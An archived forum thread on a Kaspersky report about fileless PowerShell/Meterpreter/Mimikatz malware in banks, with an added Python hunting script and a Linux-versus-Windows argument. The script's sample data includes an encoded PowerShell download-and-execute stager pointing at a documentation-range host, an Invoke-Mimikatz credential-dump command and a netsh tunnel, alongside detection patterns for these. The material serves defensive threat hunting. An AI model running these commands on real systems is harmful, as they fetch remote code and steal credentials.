Gizmos Freeware Reviews
Gizmo's Freeware Forum > Debating Chamber > Security
18. Jun 2015, 07:38 AM   #51
J_L (Co-Author, Best Free Security List)
Just don't install executables downloaded outside of your trusted websites. Use VirusTotal if necessary. Something like WOT helps a lot.

Basically, getting infected from something like a drive-by download is extremely unlikely unless you're using outdated software.

13. Feb 2017, 01:31 PM   #52
Wolfram (Member)
An infection unlike anything they’d seen before

Once again, I have bad news:

A new Kaspersky report talks about "invisible" malware found in banking systems in over 40 countries.

https://securelist.com/blog/research...rise-networks/
http://news.softpedia.com/news/invis...s-512740.shtml


According to this report, at least 140 banks and other enterprises have been infected by malware that’s nearly invisible. Although this is the official number as of right now, given the difficulties involved in spotting this malware, the number could be much, much higher, Kaspersky specialists warn.

This is the same type of infection that Kaspersky found on its own corporate network a couple of years ago, an infection unlike anything they’d seen before. Duqu 2.0, as it was dubbed, was believed to be derived from Stuxnet, the sophisticated computer worm that was supposedly created by the US in collaboration with Israel to sabotage the nuclear program in Iran. Duqu 2.0 managed to remain undetected on Kaspersky’s network for at least six months.


"New attacks

Now, a similar infection is spreading like wildfire among countless companies, including many banks. These hard-to-detect infections use legitimate system admin and security tools, such as PowerShell, Metasploit, and Mimikatz to inject malware into computer memory.

Kaspersky has chosen not to name the institutions that are currently under attack for obvious reasons, but they did mention that they come from 40 different countries. The United States, France, Ecuador, Kenya and the United Kingdom are the five most affected nations.

What makes this series of attacks particularly nasty is the fact that, on top of being nearly impossible to detect for long periods of time, it is unknown just who could be behind it all - whether there's a single group of individuals or numerous hacker groups. Unless someone claims the attacks, there's going to be a long wait before the security researchers and authorities figure out just who's responsible.


How does it work?

The first discovery of this particular malware took place in late 2016. Then, a bank’s security team found a copy of Meterpreter in the physical memory of a Microsoft domain controller. The forensic analysis revealed that the Meterpreter code was downloaded and injected into memory with the help of PowerShell commands.

The Microsoft NETSH networking tool was also used by the infected machine to transport data to servers controlled by the attacker. Mimikatz was used by the attackers to obtain admin privileges necessary for such actions. To clean up the logs a bit, the PowerShell commands were hidden in the Windows registry, thus making it all difficult to track.

It seems that the method was used to collect passwords of system administrators and for the remote administration of infected host machines.

While the number of attacks is quite large, this seems to be the method used across most of them, which helped identify the extent of the situation."



With Windows in a ROM chip, something like this would never have happened.
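The quoted write-up describes the pattern without showing what a defender would actually look for: a PowerShell launcher parked in a registry value, an -EncodedCommand payload that stages Meterpreter or Mimikatz in memory, and netsh used to tunnel traffic out. The script below is an added example, not code from the post, from Kaspersky or from Softpedia: it decodes PowerShell -EncodedCommand payloads (base64 of UTF-16LE, which is how PowerShell encodes them) and runs a small set of indicator patterns over registry autorun values, service ImagePath strings and process command lines. The indicator labels, the regexes and the sample registry entries are my own constructions for illustration; the 192.0.2.x addresses come from the RFC 5737 documentation range and are not real C2 servers.

```python
"""Hunt for the fileless-attack indicators described in the quoted report.

Added example; not Kaspersky's detection logic.  The patterns below are
illustrative starting points a practitioner would tune for their estate.
"""
import base64
import re

# PowerShell accepts -e, -ec, -enc and -EncodedCommand (case-insensitive).
ENC_RE = re.compile(r"\s-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

# Labels are our own; each maps to a behaviour from the write-up.
INDICATORS = {
    "encoded_powershell": re.compile(
        r"powershell(?:\.exe)?\b.*\s-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_noprofile": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "in_memory_exec": re.compile(
        r"\bIEX\b|Invoke-Expression|\[(?:System\.)?Reflection\.Assembly\]::Load"
        r"|VirtualAlloc|CreateThread", re.I),
    "mimikatz": re.compile(r"Invoke-Mimikatz|sekurlsa::logonpasswords", re.I),
    "meterpreter_stager": re.compile(r"Invoke-Shellcode|meterpreter", re.I),
    "netsh_portproxy": re.compile(r"\bnetsh\b.*\binterface\s+portproxy\s+add\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def scan_command(cmdline):
    """Sorted indicator labels hit by a command line.

    The decoded -EncodedCommand payload (if any) is appended so that
    indicators hidden behind base64 are inspected as well.
    """
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text = cmdline + "\n" + decoded
    return sorted(label for label, rx in INDICATORS.items() if rx.search(text))


def hunt(entries):
    """entries: iterable of (source, command).  Returns only suspicious ones."""
    hits = []
    for source, command in entries:
        labels = scan_command(command)
        if labels:
            hits.append({"source": source, "indicators": labels,
                         "decoded": decode_encoded_command(command)})
    return hits


# Constructed sample data modelled on the write-up: a launcher in an autorun
# value, a service staging code in memory and dumping credentials, a netsh
# tunnel, and a benign autorun entry that must not fire.
STAGER_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.10/x")'
ENCODED_STAGER = base64.b64encode(STAGER_SCRIPT.encode("utf-16le")).decode("ascii")

SAMPLE_ENTRIES = [
    ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     f"powershell.exe -NoP -W Hidden -enc {ENCODED_STAGER}"),
    ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\svchelper\\ImagePath",
     "powershell.exe -nop -c \"[Reflection.Assembly]::Load($b); Invoke-Mimikatz -DumpCreds\""),
    ("Event 4688 process creation",
     "netsh interface portproxy add v4tov4 listenport=4444 "
     "connectaddress=192.0.2.20 connectport=443"),
    ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_ENTRIES):
        print(hit["source"])
        print("  indicators:", ", ".join(hit["indicators"]))
        if hit["decoded"]:
            print("  decoded   :", hit["decoded"])
```

In a real hunt the entries would come from an autoruns export, the Services hive and PowerShell ScriptBlock logging (event 4104) rather than from the inline list; the point is that the encoded launcher only becomes visible once the UTF-16LE base64 is unwrapped, which is why a check on the raw registry string alone misses the download cradle.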
13. Feb 2017, 01:46 PM   #53
MidnightCowboy (Site Manager)

Issues like this surface from time to time and for obvious reasons will continue to do so. There are however some very simple steps users can take to avoid loss.
  • Use Linux (either installed or from a live session CD) or a specialized tool such as Tails to do your online banking.
  • Pay your bank's fraud insurance
  • Check your account regularly to comply with the insurance terms and conditions
13. Feb 2017, 05:29 PM   #54
Cthulhux (Senior Member)

How does using Linux prevent loss?
13. Feb 2017, 06:07 PM   #55
MidnightCowboy (Site Manager)

Quote:
Originally Posted by Cthulhux
How does using Linux prevent loss?
See here - just one example.

http://voices.washingtonpost.com/sec..._down_non.html
13. Feb 2017, 06:16 PM   #56
Cthulhux (Senior Member)

There is no reason to not use a locked-down Windows PC for that.
13. Feb 2017, 06:39 PM   #57
MidnightCowboy (Site Manager)

Quote:
Originally Posted by Cthulhux
There is no reason to not use a locked-down Windows PC for that.
Well, Brian Krebs is one of the world's leading experts on cybercrime. He doesn't recommend this, but if you feel safe doing it then it's your money to lose and not his or mine. Not only that, 95% of Windows users do not know how to lock down their PC even if they were so inclined.
13. Feb 2017, 06:47 PM   #58
Cthulhux (Senior Member)

I don't think that someone who recommends Ubuntu (officially disapproved by the Free Software Foundation due to a horrible history of spyware and similar atrocities) should be seen more as an "expert" than me.

So how do you explain the large Linux botnets? How do you explain that the recommended Ubuntu distribution has even more critical problems than the notorious Flash player? If you're interested in security, you should get rid of Linux and install Windows as soon as you can.

Also, I'm positive that "95% of Windows users" would be able to boot a locked-down Windows VM (e.g. VirtualBox) for their banking needs any time.
13. Feb 2017, 07:17 PM   #59
MidnightCowboy (Site Manager)

I think you are grabbing at straws because you, being a self proclaimed expert, must already know the answers to your own questions, and not exactly what the content of your post suggests. For example.

http://www.zdnet.com/article/linux-a...-linuxs-fault/

Also, the existence of security flaws is only a real-time vulnerability if there also exists a willingness to exploit them. It is therefore ludicrous to compare Ubuntu with Flash, but then you know this too.
13. Feb 2017, 08:41 PM   #60
Cthulhux (Senior Member)

I was hoping you could provide a reasoning behind your implicit suggestion that Windows users should use a flawed and erroneous system like Linux for their banking needs. Turns out you can't. If a botnet is not Linux's fault, it's not Windows's fault either.
Last edited by Cthulhux; 13. Feb 2017 at 08:47 PM.

All times are GMT +1.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2021, vBulletin Solutions, Inc.